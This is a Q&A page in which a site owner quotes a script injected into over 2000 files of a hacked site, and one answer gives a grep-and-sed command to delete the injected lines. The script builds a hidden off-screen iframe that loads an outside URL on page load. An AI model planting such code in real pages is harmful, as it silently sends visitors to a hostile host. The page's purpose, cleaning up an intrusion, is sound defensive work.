Sign Up

Sign Up to our social questions and Answers Engine to ask questions, answer people’s questions, and connect with other people.

Have an account? Sign In

Have an account? Sign In Now

Sign In

Login to our social questions & Answers Engine to ask questions answer people’s questions & connect with other people.

Sign Up Here

Forgot Password?

Don't have account, Sign Up Here

Forgot Password

Lost your password? Please enter your email address. You will receive a link and will create a new password via email.

Have an account? Sign In Now

You must login to ask a question.

Forgot Password?

Need An Account, Sign Up Here

Please briefly explain why you feel this question should be reported.

Please briefly explain why you feel this answer should be reported.

Please briefly explain why you feel this user should be reported.

Sign InSign Up

The Archive Base

The Archive Base Logo The Archive Base Logo

The Archive Base Navigation

  • Home
  • SEARCH
  • About Us
  • Blog
  • Contact Us
Search
Ask A Question

Mobile menu

Close
Ask a Question
  • Home
  • Add group
  • Groups page
  • Feed
  • User Profile
  • Communities
  • Questions
    • New Questions
    • Trending Questions
    • Must read Questions
    • Hot Questions
  • Polls
  • Tags
  • Badges
  • Buy Points
  • Users
  • Help
  • Buy Theme
  • SEARCH
Home/ Questions/Q 8649821
In Process

The Archive Base Latest Questions

Editorial Team
  • 0
Editorial Team
Asked: June 12, 20262026-06-12T13:39:10+00:00 2026-06-12T13:39:10+00:00

Yesterday my site was hacked and it has the code like: <script> function frmAdd()

  • 0

Yesterday my site was hacked and it has the code like:

<script>  
    function frmAdd() { 
        var ifrm = document.createElement('iframe'); 
        ifrm.style.position='absolute'; 
        ifrm.style.top='-999em'; 
        ifrm.style.left='-999em'; 
        ifrm.src = \"http://fenwaywest.com/media/index.php\";
        ifrm.id = 'frmId';
        document.body.appendChild(ifrm);
    };
    window.onload = frmAdd;
</script>";

When I search the server using the below command to find the affected files

grep -r "<script>  function frmAdd()" /path/

I got more than 2000 files.

Now I need to remove that line only. Please, someone can you guide the command only to remove that line in all 2000 files?

  • 1 1 Answer
  • 0 Views
  • 0 Followers
  • 0
Share
  • Facebook
  • Report

Leave an answer
Cancel reply

You must login to add an answer.

Forgot Password?

Need An Account, Sign Up Here

1 Answer

  • Voted
  • Oldest
  • Recent
  • Random
  1. Editorial Team
    Editorial Team
    2026-06-12T13:39:11+00:00Added an answer on June 12, 2026 at 1:39 pm

    Back up first! Then, you might try something like this:

    grep -lr " function frmAdd" /path/ | xargs sed -i '/ function frmAdd/d'
    

    This will delete any line matching that regex. It also assumes the path does not contain spaces (hopefully a reasonable assumption here).

    • 0
    • Reply
    • Share
      Share
      • Share on Facebook
      • Share on Twitter
      • Share on LinkedIn
      • Share on WhatsApp
      • Report

Sidebar

Related Questions

Yesterday for about 2 minutes the error log for my site has this error
I stumbled on a site yesterday and forgot to bookmark the url. I'm stumped
I have been using a demo site since yesterday and made a version on
Yesterday i saw a site in which, site is listing the ip address and
I just learned yesterday from this site that I can: class Seq(object): def __init__(self,
My site allows users to submit After Action Reports and yesterday someone set the
i have a Magento site in which the checkout process worked fine until yesterday
I started reading about struts2 yesterday and came across the below slide. Site link
I took a backup of my live Magento site yesterday (zipped up the files
Yesterday I was reading some articles in this site while I stumbled on an

Explore

  • Home
  • Add group
  • Groups page
  • Communities
  • Questions
    • New Questions
    • Trending Questions
    • Must read Questions
    • Hot Questions
  • Polls
  • Tags
  • Badges
  • Users
  • Help
  • SEARCH

Footer

© 2021 The Archive Base. All Rights Reserved
With Love by The Archive Base

Insert/edit link

Enter the destination URL

Or link to existing content

    No search term specified. Showing recent items. Search or use up and down arrow keys to select an item.